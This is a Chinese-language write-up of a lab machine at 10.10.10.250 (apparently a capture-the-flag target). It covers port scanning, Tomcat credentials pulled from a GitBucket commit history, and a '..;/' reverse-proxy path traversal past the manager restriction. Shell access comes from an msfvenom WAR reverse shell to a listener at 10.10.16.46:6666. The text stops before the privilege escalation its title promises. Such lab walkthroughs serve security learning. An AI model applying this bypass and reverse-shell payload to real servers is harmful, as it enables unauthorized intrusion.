第二台 利用ansible-playbook提权
第二台
目标ip:10.10.10.250拿到目标还是先扫描端口 进行信息收集
命令:nmap -v -sSV -Pn 10.10.10.250 -T4 -sC发现开了22 443 8080直接先打开8080端口看看
发现是一个登陆框 cms是 gitbucket试了下弱口令 发现不存在 那就注册一个
注册之后然后登录
这应该是一个代码仓库
因为前面还有443端口开发 打开443端口看看
之前nmap扫描出443端口,但是无法访问https,写入hosts尝试登录添加到host 因为扫描出有一个seal.xxx
echo 10.10.10.250 seal.xxx >> /etc/hosts是一个商城 那8080 的的确是443的代码库
然后继续翻代码库 通过找最近commits 在tomcat里面翻到了账户密码
http://10.10.10.250:8080/root/seal_market/commit/971f3aa3f0a0cc8aac12fd696d9631ca540f44c7username = tomcatpassword = 42MrHBf*z8{Z%尝试访问tomcat默认登录目录/manager/statushttps://seal.xxx/manager/status
输入找到的账户密码 成功登录
因为前面根据nmap 扫描出tomcat是通过反代的 这样会存在一个问题这个问题这里参考https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/管理界面/manager/html无法访问显示权限不够
这里就可以利用tomcat 和反代的漏洞 用..;/绕过
https://seal.xxx/manager/status/..;/html然后这里有一个上传的地方
然后打包一个war包的shell上传msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.46 LPORT=6666 -f war -o shell.war
在上传之前,请记住一件事。这里存在路径遍历漏洞。所以,你不能直接上传.war文件。唯一的过程是在上传之前修改路径,因此我在Burpsuite中拦截了上传请求以进一步修改。
上传之后 开启监听 然后访问 https://seal.xxx/shell/nc -lvvp 6666
发现还有个luis 这个开始在8080端口里面也发现了
然后在lusi目录下发现user.txt
命令:find / -name user.txt但是查看user.txt的时候发现没有权限
需要提权了
